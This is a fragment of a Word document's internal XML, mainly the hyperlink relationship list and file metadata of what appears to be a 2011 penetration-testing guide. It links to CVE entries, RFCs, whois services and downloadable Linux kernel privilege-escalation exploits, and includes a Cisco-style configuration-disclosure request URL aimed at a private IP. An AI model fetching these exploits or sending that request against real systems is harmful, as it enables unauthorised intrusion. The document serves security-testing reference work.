Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/1397" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/1397" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8369" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc5735" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc3068" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dogpile.com/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vulnwatch.org/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/pwnedUselibKernelExploit.c" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2451" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2451" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0736" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/pwnedUselibKernelExploit.c" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/1397" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/0607-exploits/h00lyshit.c" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/8478" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8572" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xm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tools.ietf.org/html/rfc1700" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whois.afrinic.net/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.1.252/level/99/exec/show/config" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2451" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xforce.iss.net" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1235" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0736" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0736" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0736" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/0607-exploits/h00lyshit.c" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/8478" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8369" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc3927" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc1918" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclists.org/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl.c" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.altavista.com/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/160" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0736" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/0607-exploits/h00lyshit.c" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/0607-exploits/h00lyshit.c" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1235" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8572" TargetMode="External"/><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www.apnic.net/whois/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc919" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://secunia.com/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl2.c" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8572" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/160" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/binfmt_elf.c" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/8478" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc2544" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc1918" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ws.arin.net/whois/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://uk.yahoo.com/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/binfmt_elf.c" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8369" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/mremap_poc_2.c" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/160" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl.c" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185" TargetMode="External"/><Relationship Id="rId184"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en.wikipedia.org/wiki/Sockstress" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/27801.c" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc5737" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.packetstormsecurity.org" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/mremap_poc_2.c" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/pwnedUselibKernelExploit.c" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2451" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8572" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc5735" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bing.com/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4210" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl.c" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc1700" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://whois.lacnic.net/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.securityfocus.com/vulnerabilities/exploits/mremap_poc_2.c" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/pwnedUselibKernelExploit.c" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl2.c" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0xdeadbeef.info/exploits/raptor_prctl.c" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.py" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/data/vulnerabilities/exploits/31368.c" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/exploits/8369" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://milw0rm.com/exploits/8478" TargetMode="External"/><Relationship Id="rId185"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en.wikipedia.org/wiki/Multicast" TargetMode="External"/><Relationship Id="rId18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26CD3-72AE-4F93-8182-BE6E0E72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42152</Words>
  <Characters>240270</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2011-02-02T16:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-02-02T16:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>